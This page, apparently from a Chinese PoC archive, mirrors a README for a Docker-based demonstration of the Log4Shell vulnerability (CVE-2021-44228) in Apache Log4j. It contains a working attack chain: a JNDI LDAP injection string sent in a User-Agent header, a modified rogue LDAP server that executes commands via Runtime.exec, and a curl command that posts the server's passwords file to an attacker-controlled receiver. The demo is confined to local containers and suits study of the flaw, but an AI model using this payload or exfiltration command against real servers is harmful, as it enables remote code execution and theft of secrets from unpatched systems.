目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

来源
https://github.com/DiCanio/CVE-2021-44228-docker-example
关联漏洞
标题:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
介绍
# CVE-2021-44228-docker-example

A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.

## Components

### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J

**This server is `VULNERABLE` using this configuration.**

Additional Information:

- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attackers target)

Content of `passwords.txt`:
```text
my secret
```

### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)

Additional information:

- endpoint at `receiver` (POST) will log the request body

### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.

```java
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}
```

When requested by the vulnerable server it will respond with a class running the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.

## Usage

1. setup Docker images by running:
   ```shell
   ./build.sh
   ```
2. start component containers by running:
   ```shell
   ./start.sh
   ```
3. trigger the vulnerability by running:
   ```shell
   curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
   ```
4. check the logging output of the malicious receiver component by running:
   ```shell
   docker logs --timestamps docker_malicious-receiver_1
   ```
   There should be the content of the server's `passwords.txt` file.
5. stop component containers by running:
   ```shell
   ./stop.sh
   ```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →